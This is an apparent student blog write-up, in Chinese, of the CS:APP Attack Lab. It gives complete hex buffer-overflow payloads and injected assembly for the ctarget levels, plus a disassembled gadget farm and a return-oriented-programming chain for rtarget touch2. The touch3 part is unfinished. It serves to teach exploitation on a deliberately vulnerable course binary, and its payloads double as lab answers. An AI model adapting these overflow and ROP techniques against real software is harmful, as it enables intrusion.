注意!进行该lab时要传递-q参数,否则会校验主机名导致lab无法进行
gdb使用set args -q设置参数。
该lab分为两个大部分,分别是ctarget和rtarget,其中ctarget没有设置随机栈等保护机制,而rtarget则需要使用程序中的gatget,寻找有用的代码片段(断章取义bushi)来执行我们期望的行为。
ctarget
先在getbuf处打断点进入程序:

红框中的缓冲区即为我们要攻击的地方。
touch1
反汇编touch1:

此处可以得知touch1的地址是0x4017c0,考虑到小端序,最后跳转地址处数据为c0 17 40 00 00 00 00 00.跳转地址前的区域进行填充即可,所以最终答案可以是:
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00touch2
touch2的任务是将getbuf返回至touch2并传递cookie参数(即,将参数传递至rdi寄存器),因为ctarget的栈是可执行的,所以可以直接在缓冲区设置代码。这里我选择将代码放置在缓冲区的栈顶,即0x5561dc78处。
然后反汇编touch2,得到touch2的地址0x4017ec:

接下来可以写出要放在栈中的代码:
movq $0x59b997fa, %rdi
pushq $0x4017ec
ret
使用gcc -c exploit2.s生成机器码,然后使用objdump -D exploit2.o查看,最后构造字符串:
48 c7 c7 fa 97 b9 59
68 ec 17 40 00
c3
00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00使用./hex2raw < exploit2.txt | ./ctarget -q,成功PASS:

touch3
与touch2不同的地方是,touch3传入的是一个指针,指向了cookie作为ASCII存储的字符串,所以需要先将cookie转换成ASCII标准的二进制数据,即35 39 62 39 39 37 66 61 00(由于是字符串,最后需要\0)
接着对touch3进行反汇编:

需要注意的是,touch3还调用了其他函数,所以最好把字符串放在不会被分配给下一个栈帧的区域(即返回地址的下面,上一个栈帧区域)。同时,我们也知道了touch3的地址0x4018fa,由此可以开始构建代码:
movq $0x5561dca8, %rdi
pushq $0x4018fa
ret
最后可以开始构造输入字符串:
48 c7 c7 a8 dc 61 55
68 fa 18 40 00
c3
00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00
35 39 62 39 39 37 66 61 00rtarget
rtarget引入了随机栈和不可执行栈,使得我们不能直接使用指向数据的指针,而且不能在缓冲区中直接放置代码,而是要使用程序中已经存在的gadget代码来执行我们需要的操作。所以首先我们要做的是对farm代码部分进行反汇编:
0000000000401994 <start_farm>:
401994: b8 01 00 00 00 mov $0x1,%eax
401999: c3 ret
000000000040199a <getval_142>:
40199a: b8 fb 78 90 90 mov $0x909078fb,%eax
40199f: c3 ret
00000000004019a0 <addval_273>:
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 ret
00000000004019a7 <addval_219>:
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3 ret
00000000004019ae <setval_237>:
4019ae: c7 07 48 89 c7 c7 movl $0xc7c78948,(%rdi)
4019b4: c3 ret
00000000004019b5 <setval_424>:
4019b5: c7 07 54 c2 58 92 movl $0x9258c254,(%rdi)
4019bb: c3 ret
00000000004019bc <setval_470>:
4019bc: c7 07 63 48 8d c7 movl $0xc78d4863,(%rdi)
4019c2: c3 ret
00000000004019c3 <setval_426>:
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 ret
00000000004019ca <getval_280>:
4019ca: b8 29 58 90 c3 mov $0xc3905829,%eax
4019cf: c3 ret
00000000004019d0 <mid_farm>:
4019d0: b8 01 00 00 00 mov $0x1,%eax
4019d5: c3 ret
00000000004019d6 <add_xy>:
4019d6: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
4019da: c3 ret
00000000004019db <getval_481>:
4019db: b8 5c 89 c2 90 mov $0x90c2895c,%eax
4019e0: c3 ret
00000000004019e1 <setval_296>:
4019e1: c7 07 99 d1 90 90 movl $0x9090d199,(%rdi)
4019e7: c3 ret
00000000004019e8 <addval_113>:
4019e8: 8d 87 89 ce 78 c9 lea -0x36873177(%rdi),%eax
4019ee: c3 ret
00000000004019ef <addval_490>:
4019ef: 8d 87 8d d1 20 db lea -0x24df2e73(%rdi),%eax
4019f5: c3 ret
00000000004019f6 <getval_226>:
4019f6: b8 89 d1 48 c0 mov $0xc048d189,%eax
4019fb: c3 ret
00000000004019fc <setval_384>:
4019fc: c7 07 81 d1 84 c0 movl $0xc084d181,(%rdi)
401a02: c3 ret
0000000000401a03 <addval_190>:
401a03: 8d 87 41 48 89 e0 lea -0x1f76b7bf(%rdi),%eax
401a09: c3 ret
0000000000401a0a <setval_276>:
401a0a: c7 07 88 c2 08 c9 movl $0xc908c288,(%rdi)
401a10: c3 ret
0000000000401a11 <addval_436>:
401a11: 8d 87 89 ce 90 90 lea -0x6f6f3177(%rdi),%eax
401a17: c3 ret
0000000000401a18 <getval_345>:
401a18: b8 48 89 e0 c1 mov $0xc1e08948,%eax
401a1d: c3 ret
0000000000401a1e <addval_479>:
401a1e: 8d 87 89 c2 00 c9 lea -0x36ff3d77(%rdi),%eax
401a24: c3 ret
0000000000401a25 <addval_187>:
401a25: 8d 87 89 ce 38 c0 lea -0x3fc73177(%rdi),%eax
401a2b: c3 ret
0000000000401a2c <setval_248>:
401a2c: c7 07 81 ce 08 db movl $0xdb08ce81,(%rdi)
401a32: c3 ret
0000000000401a33 <getval_159>:
401a33: b8 89 d1 38 c9 mov $0xc938d189,%eax
401a38: c3 ret
0000000000401a39 <addval_110>:
401a39: 8d 87 c8 89 e0 c3 lea -0x3c1f7638(%rdi),%eax
401a3f: c3 ret
0000000000401a40 <addval_487>:
401a40: 8d 87 89 c2 84 c0 lea -0x3f7b3d77(%rdi),%eax
401a46: c3 ret
0000000000401a47 <addval_201>:
401a47: 8d 87 48 89 e0 c7 lea -0x381f76b8(%rdi),%eax
401a4d: c3 ret
0000000000401a4e <getval_272>:
401a4e: b8 99 d1 08 d2 mov $0xd208d199,%eax
401a53: c3 ret
0000000000401a54 <getval_155>:
401a54: b8 89 c2 c4 c9 mov $0xc9c4c289,%eax
401a59: c3 ret
0000000000401a5a <setval_299>:
401a5a: c7 07 48 89 e0 91 movl $0x91e08948,(%rdi)
401a60: c3 ret
0000000000401a61 <addval_404>:
401a61: 8d 87 89 ce 92 c3 lea -0x3c6d3177(%rdi),%eax
401a67: c3 ret
0000000000401a68 <getval_311>:
401a68: b8 89 d1 08 db mov $0xdb08d189,%eax
401a6d: c3 ret
0000000000401a6e <setval_167>:
401a6e: c7 07 89 d1 91 c3 movl $0xc391d189,(%rdi)
401a74: c3 ret
0000000000401a75 <setval_328>:
401a75: c7 07 81 c2 38 d2 movl $0xd238c281,(%rdi)
401a7b: c3 ret
0000000000401a7c <setval_450>:
401a7c: c7 07 09 ce 08 c9 movl $0xc908ce09,(%rdi)
401a82: c3 ret
0000000000401a83 <addval_358>:
401a83: 8d 87 08 89 e0 90 lea -0x6f1f76f8(%rdi),%eax
401a89: c3 ret
0000000000401a8a <addval_124>:
401a8a: 8d 87 89 c2 c7 3c lea 0x3cc7c289(%rdi),%eax
401a90: c3 ret
0000000000401a91 <getval_169>:
401a91: b8 88 ce 20 c0 mov $0xc020ce88,%eax
401a96: c3 ret
0000000000401a97 <setval_181>:
401a97: c7 07 48 89 e0 c2 movl $0xc2e08948,(%rdi)
401a9d: c3 ret
0000000000401a9e <addval_184>:
401a9e: 8d 87 89 c2 60 d2 lea -0x2d9f3d77(%rdi),%eax
401aa4: c3 ret
0000000000401aa5 <getval_472>:
401aa5: b8 8d ce 20 d2 mov $0xd220ce8d,%eax
401aaa: c3 ret
0000000000401aab <setval_350>:
401aab: c7 07 48 89 e0 90 movl $0x90e08948,(%rdi)
401ab1: c3 ret
0000000000401ab2 <end_farm>:
401ab2: b8 01 00 00 00 mov $0x1,%eax
401ab7: c3 ret
401ab8: 90 nop
401ab9: 90 nop
401aba: 90 nop
401abb: 90 nop
401abc: 90 nop
401abd: 90 nop
401abe: 90 nop
401abf: 90 noprtarget分为touch2和touch3两个问题
touch2
首先获取touch2的地址0x4017ec

所以这里我们要实现的功能就是:
48 c7 c7 fa 97 b9 59 mov $0x59b997fa,%rdi
68 ec 17 40 00 push $0x4017ec
c3 ret或者是
pop %rdi
retpop时栈弹出的数据设置为cookie值。
第一个太过于专用,farm中几乎不可能存在,所以我们需要找到第二种或是第二种的拆分版本。
pop %rdi的机器码是5f,farm中不存在,我们可以将其拆分为
弹出到其他寄存器再mov到rdi中,即58到5f(一般mov %rax,%rdi频率较高,因为rax持有返回值,rdi持有第一个参数),并且在弹出之后可以立即返回或是进行下一步期望的操作,所以这个数后面还需要跟90(nop)(可选)c3(ret).
按照这个逻辑,我们可以找到0x4019ab和0x4019cc.(pop rax)
我们取0x4019cc继续查找是否存在mov %rax, %rdi,然后我们可以找到0x4019a2和0x4019c5.
接下来就可以构建字符串了:先填充到返回地址处,然后改写成0x4019cc,接着存放cookie值,接着存放第二个gadget地址0x4019c5,最后存放touch2地址进入touch2.
所以最终的答案是:
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
cc 19 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00
c5 19 40 00 00 00 00 00
ec 17 40 00 00 00 00 00
答案不唯一。
touch3
未完不知道续不续。。。
没有评论